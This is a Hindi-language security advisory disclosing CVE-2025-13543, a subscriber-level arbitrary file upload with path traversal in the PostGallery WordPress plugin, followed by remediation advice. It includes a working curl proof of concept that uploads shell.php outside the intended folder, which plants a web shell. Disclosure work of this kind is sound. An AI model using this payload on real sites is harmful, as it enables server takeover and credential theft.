
CVE-2025-13543 के लिए प्रकटीकरण
CVE-2025-13543 के लिए प्रकटीकरण
यह रिपॉज़िटरी PostGallery <= 1.12.5 में खोजी गई एक भेद्यता का प्रकटीकरण करती है, जो rtowebsites द्वारा विकसित WordPress प्लगइन है।
| CVE ID | प्रकार | घटक | प्रभाव |
|---|---|---|---|
| CVE-2025-13543 | प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोड | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | अप्रमाणित हमलावर मनमाना फ़ाइल अपलोड कर सकता है |
postgalleryAjaxUpload) और PostGalleryUploader बैकएंडcurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php और डेटाबेस क्रेडेंशियल का बहिर्वाह, स्थायी बैकडोर की तैनाती और दुष्ट व्यवस्थापक खातों का निर्माण शामिल है।lib/ajax-actions/imageUpload.php में उचित प्राधिकरण लागू करें (उदाहरण के लिए, current_user_can('upload_files') आवश्यक करें) और अपलोड संसाधित करने से पहले एक क्रिप्टोग्राफ़िक नॉन्स सत्यापित करें।admin/PostGalleryUploader.php में, uploadFolder को wp-content/uploads/gallery की किसी ज्ञात उपनिर्देशिका तक सख्ती से सीमित करें, ../ या निरपेक्ष पथ वाले किसी भी मान को अस्वीकार करें, और उपयोग से पहले पथों को नॉर्मलाइज़ करें।wp_handle_upload() / wp_check_filetype_and_ext() का उपयोग करें और अपलोड को गैर-निष्पादन योग्य मीडिया प्रकारों की श्वेतसूची तक सीमित रखें, जिसमें वेब-सुलभ निर्देशिकाओं में .php और अन्य निष्पादन योग्य एक्सटेंशन स्पष्ट रूप से अवरुद्ध हों।मैंने सोचा... कि CTF जैसी ऐसी भेद्यता भी मौजूद हो सकती है। अकेले मनमाना फ़ाइल अपलोड ही भयानक है, लेकिन साथ में डायरेक्टरी ट्रैवर्सल होना... कितनी निराशा की बात है। भेद्यता का पुनरुत्पादन बहुत मज़ेदार था।
नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध
यह एडवाइज़री सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय सहित साझा करने के लिए स्वतंत्र।